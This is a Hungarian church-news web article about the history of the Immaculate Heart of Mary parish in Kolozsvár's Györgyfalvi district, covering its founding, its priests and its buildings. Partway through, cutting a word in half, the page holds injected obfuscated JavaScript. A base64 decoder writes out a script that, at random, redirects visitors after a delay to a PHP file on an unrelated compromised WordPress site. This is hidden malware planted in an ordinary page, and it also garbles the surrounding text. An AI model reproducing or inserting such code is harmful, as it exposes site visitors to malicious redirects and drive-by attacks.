A hét plébániája: KOLOZSVÁR – MÁRIA SZEPLŐTELEN SZÍVE

kolozsvar_maria_szive.jpg

Szűz Mária Szeplőtelen Szíve plébánia a kolozsvári Györgyfalvi-negyed római katolikus híveit látja el. A Györgyfalvi lakónegyed Kolozsvár délkeleti részén fekszik, keleti határa a Szopori út, délen a Békás-patak, nyugaton a Györgyfalvi út és az Alverna, északon a Kövespad határolja. Nevét a várostól 8 km-re délkeletre fekvő Györgyfalváról kapta 1964-ben, amikor a Pata utca végénél, a Borháncs úttól a Bivalyrét felé, az őshonos lakosság, a hóstátiak elkobzott földjén, kertjeiben tömbházakat kezdtek építeni.  „Kincses Kolozsvár” délkeleti természetes határa a 825 m magas Feleki-domb, északi lejtőjére fokozatosan terjeszkedett a város a XX. század elején, a gyümölcsös, kertes Békás nevű külvárosi területre. 1929-ben  P. Trefán Leonárd (1875-1945) ferences rendházfőnök itt építtett kolostort és templomot,  Moll Elemér (1886-1955) műépítész tervei alapján. A Jézus Szent Szíve tiszteletére felszentelt templom, rendház és a körülötte elterülő kert, a toscanai Alvernához (Alverna = La Verna-hegy nevéből, ahol Assisi Szent Ferenc 1224. szeptember 14. megkapta Krisztus Urunk sebeit, a stigmákat) hasonló elmélkedő hellyé vált, innen lett a terület neve az Alverna. A szerzetes rend feloszlatása után (1949) az épületegyüttes és a kert a Növényvédelmi kutató állomásé lett (Agronómusok háza), Fejér Gábor a Jobbágy utcai templom akkori plébánosának sikerült átmentenie az alvernai-ferences kolostor 4 harangját ( Honig Frigyes aradi öntőde) az egyházközség templomába, ma is ezek a plébániatemplom harangjai. 1933-ban Kolozsvár akkori egyik külvárosi részében, a Pata utca környékén, dr. Hirschler József (1874-1936) kanonok, belvárosi főesperes-plébános támogatásával, napközi otthon létesült az itt lakó munkás szülők gyermekei számára. Először egy bérelt helységben a Méhes utcában volt, majd a nagylelkű adakozóktól összegyűlt pénzzel telket vásároltak a mai Ariesului (volt  J. Caesar, Jobbágy) utcában, ahol felépítették az új napközi otthont. Az elkészült új épületet 1934. november 25-én gróf Majláth Gusztáv Károly erdélyi püspök áldotta meg. A gyermekek gondozását a szociális testvérek végezték. Az épületben, a környék katolikus híveinek, kis kápolnát is kialakítottak, Fejér Gábor a Szent Mihály templom segédlelkésze, az otthon vezetője tartotta a szentmiséket, majd mivel kinevezték Lemhénybe plébánosnak (1936-1948 között), a lelkészi szolgálatot többen a belvárosi plébániáról látták el. 1937-ben az otthon épületét kibővítették, amelynek az ünnepélyes felszentelését Márton Áron a Szent Mihály plébánia akkori kanonok-plébánosa végezte, 1937. december 5-én. A környék híveinek kérésére, a körzetnek állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó papot kérve, Márton Áron már püspökként, 1949-ben megalapítja a Szűz Mária Szeplőtelen Szíve elnevezésű plébániát, amelynek első plébánosa, a visszarendelt, Fejér Gábor (1907 – 1986) lett, nyugdíjba vonulásáig. Őt követte 1983-1984 között Pénzes József ( jelenleg c. esperes-plébános a Csíkszeredai Szent Ágoston Plébánián), majd 1984-1990 között néhai Szakács Lajos (1952-2010 ) szentszéki tanácsos-esperes, volt zsögödi plébános (18 évig),  aki megnagyobbította a templom belsejét, az énekkar részére karzatot emeltetett.
1990-2001 között a lelkészség plébánosa Sánta Pál (jelenleg szentszéki tanácsos-plébános Lemhényben), vezetése alatt a hittanterem épületét átalakítják-újjáépítik, amelyet Lisieux-i Kis Szent Teréz tiszteletére szentelt fel dr. Jakubinyi György érsek.  Ő volt a megálmodója a Remény című plébániai lapnak, amely tíz éven át lelki tápláléka volt a híveknek. 2001. augusztusától a plébános Vízi Zakariás c. esperes, szolgálati ideje alatt jelentős javításokat végeztek a hittanterem és a plébániaépületben, a templom is új, szép meghitt belsőt kapott. Az általa vezetett Rosa Mystica alapítvány, a Máltai Segélyszervezet kolozsvári fiókjával közösen, számos rászoruló család és egyedül álló idős személyt támogat. A Kolozsvári Szűz Mária Szeplőtelen Szíve helyi lelkészség,  a Gyulafehérvári Római Katolikus Főegyházmegye,  Kolozs-dobokai főesperesi kerületéhez tartozik, a templom búcsúja, 2016-ban június 4-én, Szűz Mária Szeplőtelen Szíve ünnepnapján van, örökös szentségimádási nap: december 8. Az egyházközség híveinek száma mintegy nyolcszáz, gazdag a hitélet.
A lelkészség honlapjáról vett információk alapján, szerkesztette: Szebeni Lajos.

 

About the author

maradmin

Leave a Comment